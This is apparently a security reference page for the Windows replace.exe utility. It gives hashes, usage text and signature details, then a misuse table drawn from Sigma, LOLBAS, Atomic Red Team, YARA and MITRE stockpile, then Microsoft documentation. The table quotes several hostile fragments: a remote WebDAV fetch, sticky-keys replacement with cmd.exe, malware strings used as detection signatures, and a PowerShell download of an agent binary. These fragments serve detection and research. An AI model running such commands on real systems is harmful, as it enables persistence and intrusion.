replace.exe

  • File Path: C:\WINDOWS\system32\replace.exe
  • Description: Replace File Utility

Hashes

Type Hash
MD5 C429130CFDB28EDD418FD4C80434299F
SHA1 BA9CE9FE8C55C68393F261C1F49A52C5463C17DC
SHA256 EB7487C0229B7DDF4B1C29312E5DDFCE90D71836B3A1E73ACD1AEC0FFEE301F7
SHA384 52862FCE7093B2C2A1BC239A24AC1FACA084DD511536D4EAEA3F34B785ECBEFC540C367AEAFCE6F112FB1B199AA4C666
SHA512 BAD2DE5FDB4F0B9D2D77C43477A00808B09FCB05127FC4A266866E0D8E543FE8AC7E9AA7DA4BEDE9E909CAFA5C1C48BAF586994C7D5E0C66FC42C6E425D73D32
SSDEEP 384:aPqTz3ULYzloMqsGRegTWpF56L1m9Acd/1YdYqxn7ptW1h/W:aPqULYzlo+Ggzwm2cd/1YdY4pE
IMP B8B8661E3130FA043E26C71CD60FB430
PESHA1 B119C127971ED55E0983AAB5ED949F66CF8FFC6B
PE256 23C51A5B6C5C62E908507425E1C60D15E8AEB110B25C035A5206E675A1314FDA

Runtime Data

Usage (stdout):

Replaces files.

REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W] [/U]

  [drive1:][path1]filename Specifies the source file or files.
  [drive2:][path2]         Specifies the directory where files are to be
                           replaced.
  /A                       Adds new files to destination directory. Cannot
                           use with /S or /U switches.
  /P                       Prompts for confirmation before replacing a file or
                           adding a source file.
  /R                       Replaces read-only files as well as unprotected
                           files.
  /S                       Replaces files in all subdirectories of the
                           destination directory. Cannot use with the /A
                           switch.
  /W                       Waits for you to insert a disk before beginning.
  /U                       Replaces (updates) only files that are older than
                           source files. Cannot use with the /A switch.

Usage (stderr):

Invalid switch - --help

Loaded Modules:

Path
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\system32\replace.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: REPLACE.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/eb7487c0229b7ddf4b1c29312e5ddfce90d71836b3a1e73acd1aec0ffee301f7/detection

Possible Misuse

The following table contains possible examples of replace.exe being misused. While replace.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source | Source File | Example | License – | – | – | – sigma | gcp_kubernetes_admission_controller.yml | - replace | DRL 1.0 sigma | cisco_cli_moving_data.yml | - 'configure replace' | DRL 1.0 sigma | posh_ps_susp_wallpaper.yml | title: Replace Desktop Wallpaper by Powershell | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | title: Suspicious Replace.exe Execution | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | description: Replace.exe is used to replace file with another file | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | - https://lolbas-project.github.io/lolbas/Binaries/Replace/ | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | - 'replace ' | DRL 1.0 LOLBAS | AcroRd32.yml | - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary | LOLBAS | ROCCAT_Swarm.yml | - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe | LOLBAS | Replace.yml | Name: Replace.exe | LOLBAS | Replace.yml | Description: Used to replace file with another file | LOLBAS | Replace.yml | - Command: replace.exe C:\Source\File.cab C:\Destination /A | LOLBAS | Replace.yml | - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | LOLBAS | Replace.yml | - Path: C:\Windows\System32\replace.exe | LOLBAS | Replace.yml | - Path: C:\Windows\SysWOW64\replace.exe | LOLBAS | Replace.yml | - IOC: Replace.exe retrieving files from remote server | malware-ioc | misp_invisimole.json | "description": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", | © ESET 2014-2018 malware-ioc | nouns.txt | replace | © ESET 2014-2018 malware-ioc | stantinko | var c = a[b].toLocaleLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018 malware-ioc | stantinko | a = a.toLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018 malware-ioc | misp-turla-outlook-event.json | "description": "The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.[[Citation: Microsoft Component Object Model]] Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[[Citation: GDATA COM Hijacking]] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.\n\nDetection: There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\<\/code> may be anomalous and should be investigated since user objects will be loaded prior to machine objects in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\<\/code>.[[Citation: Endgame COM Hijacking]] Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Windows Registry, DLL monitoring, Loaded DLLs\n\nContributors: ENDGAME", | © ESET 2014-2018 malware-ioc | windigo | replace: | © ESET 2014-2018 atomic-red-team | problem_report.md | ℹ Please replace this with what you did. | MIT License. © 2018 Red Canary atomic-red-team | problem_report.md | ℹ Please replace this with what you expected to happen. | MIT License. © 2018 Red Canary atomic-red-team | problem_report.md | ℹ Please replace this with of what happened instead. | MIT License. © 2018 Red Canary atomic-red-team | index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary atomic-red-team | index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary atomic-red-team | index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary atomic-red-team | linux-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary atomic-red-team | macos-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary atomic-red-team | windows-index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary atomic-red-team | windows-index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary atomic-red-team | T1003.md | $cleanupUpdatedValue = $cleanupUpdatedValue -replace ‘,NPPSpy’,’’ | MIT License. © 2018 Red Canary atomic-red-team | T1053.003.md | - Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary atomic-red-team | T1053.003.md | ## Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary atomic-red-team | T1070.006.md | | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | MIT License. © 2018 Red Canary atomic-red-team | T1098.md | $account = $member.Name -replace “.+\",”” # strip computername\ | MIT License. © 2018 Red Canary atomic-red-team | src | - If Excel asks “A file name ‘…’ already exists in this location. Do you want to replace it?”, click Yes. | MIT License. © 2018 Red Canary atomic-red-team | T1204.002.md | $macroCode = $macroCode -replace ‘serverPath’, $URL -replace ‘fileName’, “#{file_name}” | MIT License. © 2018 Red Canary atomic-red-team | T1221.md | <blockquote>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) | MIT License. © 2018 Red Canary atomic-red-team | T1491.001.md | - Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary atomic-red-team | T1491.001.md | ## Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary atomic-red-team | T1546.008.md | - Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary atomic-red-team | T1546.008.md | ## Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary atomic-red-team | T1546.008.md | Replace sticky keys binary (sethc.exe) with cmd.exe | MIT License. © 2018 Red Canary atomic-red-team | T1546.015.md | Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </blockquote> | MIT License. © 2018 Red Canary atomic-red-team | T1547.009.md | Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</blockquote> | MIT License. © 2018 Red Canary atomic-red-team | T1558.001.md | “@ -Replace “DOMAIN_SID”, $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary atomic-red-team | T1558.001.md | “@ -Replace “kirbifile”, $filename | Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary atomic-red-team | T1564.md | $macro = $macro -replace “aREPLACEMEa”, “PathToAtomicsFolder\T1564\bin\extractme.bin” | MIT License. © 2018 Red Canary atomic-red-team | T1574.001.md | If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</blockquote> | MIT License. © 2018 Red Canary signature-base | [apt_apt29grizzly_steppe.yar](https://github.com/Neo23x0/signature-base/blob/master/yara/apt_apt29_grizzly_steppe.yar) | $s2 = “Repeat last find command)Replace specific text with different text” fullword wide | CC BY-NC 4.0 signature-base | apt_hafnium.yar | $s3 = “Encoding.UTF8.GetString(FromBase64String(str.Replace(“ ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x1 = “Get-Content $env:Public\Libraries\update.vbs) -replace” ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x3 = “CreateObject("WScript.Shell").Run Replace(DownloadExecute,"-","bat")” fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $s4 = “’) -replace ‘’,(‘DNS’+$id) | “ fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $s7 = “’) -replace ‘’,(‘HTP’+$id) | “ fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x1 = “wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace ‘_’,(Get-Random) | Set-C” ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x1 = “(Get-Content $env:Public\Libraries\dns.ps1) -replace (‘#’+’##’),$botid | Set-Content $env:Public\Libraries\dns.ps1” fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $one5 = “cu = Replace(cu, "$", "")” ascii wide | CC BY-NC 4.0 signature-base | apt_winnti_hdroot.yar | $s8 = “tera replace dll config” fullword ascii | CC BY-NC 4.0 signature-base | cn_pentestset_webshells.yar | $s2 = “strReturn=Replace(strReturn,chr(43),"%2B") ‘JMDCW” fullword ascii | CC BY-NC 4.0 signature-base | crime_emotet.yar | note = “The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation.” | CC BY-NC 4.0 signature-base | crime_goldeneye.yar | $x1 = “fso.GetTempName();tmp_path = tmp_path.replace(‘.tmp’, ‘.exe’)” fullword ascii | CC BY-NC 4.0 signature-base | gen_cert_payloads.yar | $fp1 = “replace it with the PEM-encoded root certificate” | CC BY-NC 4.0 signature-base | gen_fireeye_redteam_tools.yar | $s2 = “[1].replace(‘unsigned char buf[] = "’” | CC BY-NC 4.0 signature-base | gen_invoke_thehash.yar | $s1 = “$process_ID = $process_ID -replace "-00-00",""” fullword ascii | CC BY-NC 4.0 signature-base | gen_mimikatz.yar | $x9 = “\ Password replace ->” fullword wide ascii | CC BY-NC 4.0 signature-base | gen_powershell_empire.yar | $s3 = “$PersistantScript = $PersistantScript.ToString().Replace(‘EXECUTEFUNCTION’, "$PersistenceScriptName -Persist")” fullword ascii | CC BY-NC 4.0 signature-base | gen_susp_js_obfuscatorio.yar | $c4 = “)‘replace’;var” | CC BY-NC 4.0 signature-base | gen_webshells.yar | $gen_bit_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $m_multi_one1 = “Replace(“ wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $m_multi_four2 = “.Replace(“ wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $oo2 = “/").Replace("/” wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $asp_gen_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s3 = “MorfiCoder=Replace(Replace(StrReverse(Code),"//",""""),"\*\",vbCrlf)” fullword | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s4 = “echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s8 = “theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s3 = “echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s9 = “theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s3 = “If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "
")” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s7 = “theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s8 = “Obviously you replace the ip address with that of the target.” | CC BY-NC 4.0 stockpile | 3734aa1e-c536-42b3-8912-4c91b8bdce90.yml | ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("””,””)){:.highlight .language-yaml} | [Apache-2.0](https://github.com/mitre/stockpile/blob/master/LICENSE) [stockpile](https://github.com/mitre/stockpile) | [52771610-2322-44cf-816b-a7df42b4c086.yml](https://github.com/mitre/stockpile/blob/master/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml) | name: Replace a service binary with alternate binary{:.highlight .language-yaml} | [Apache-2.0](https://github.com/mitre/stockpile/blob/master/LICENSE) [stockpile](https://github.com/mitre/stockpile) | [e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml](https://github.com/mitre/stockpile/blob/master/data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml) | $url=”#{server}/file/download”; $wc=New-Object System.Net.WebClient; $wc.Headers.add(“platform”,”windows”); $wc.Headers.add(“file”,”sandcat.go”); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[“Content-Disposition”].Substring($wc.ResponseHeaders[“Content-Disposition”].IndexOf(“filename=”)+9).Replace(“"",""); [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data); | Apache-2.0 stockpile | e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("””,””);`{:.highlight .language-yaml} | Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


replace

Replace existing files in a directory. If used with the /a option, this command adds new files to a directory instead of replacing existing files.

Syntax

replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/a] [/p] [/r] [/w]
replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/p] [/r] [/s] [/w] [/u]

Parameters

Parameter Description
[<drive1>:][<path1>]<filename> Specifies the location and name of the source file or set of files. The filename option is required, and can include wildcard characters (* and ?).
[<drive2>:][<path2>] Specifies the location of the destination file. You can’t specify a file name for files you replace. If you don’t specify a drive or path, this command uses the current drive and directory as the destination.
/a Adds new files to the destination directory instead of replacing existing files. You can’t use this command-line option with the /s or /u command-line option.
/p Prompts you for confirmation before replacing a destination file or adding a source file.
/r Replaces Read-only and unprotected files. If you attempt to replace a Read-only file, but you don’t specify /r, an error results and stops the replacement operation.
/w Waits for you to insert a disk before the search for source files begins. If you don’t specify /w, this command begins replacing or adding files immediately after you press ENTER.
/s Searches all subdirectories in the destination directory and replaces matching files. You can’t use /s with the /a command-line option. The command doesn’t search subdirectories that are specified in Path1.
/u Replaces only those files on the destination directory that are older than those in the source directory. You can’t use /u with the /a command-line option.
/? Displays help at the command prompt.
Remarks
  • As this command adds or replaces files, the file names appear on the screen. After this command is done, a summary line is displayed in one of the following formats:

    nnn files added
    nnn files replaced
    no file added
    no file replaced
    
  • If you’re using floppy disks and you need to switch disks while running this command, you can specify the /w command-line option so that this command waits for you to switch the disks.

  • You can’t use this command to update hidden files or system files.

  • The following table shows each exit code and a brief description of its meaning:

    Exit code Description
    0 This command successfully replaced or added the files.
    1 This command encountered an incorrect version of MS-DOS.
    2 This command couldn’t find the source files.
    3 This command couldn’t find the source or destination path.
    5 The user doesn’t have access to the files that you want to replace.
    8 There is insufficient system memory to carry out the command.
    11 The user used the wrong syntax on the command line.

[!NOTE] You can use the ERRORLEVEL parameter on the if command line in a batch program to process exit codes that are returned by this command.

Examples

To update all the versions of a file named Phones.cli (which appear in multiple directories on drive C:), with the latest version of the Phones.cli file from a floppy disk in drive A:, type:

replace a:\phones.cli c:\ /s

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.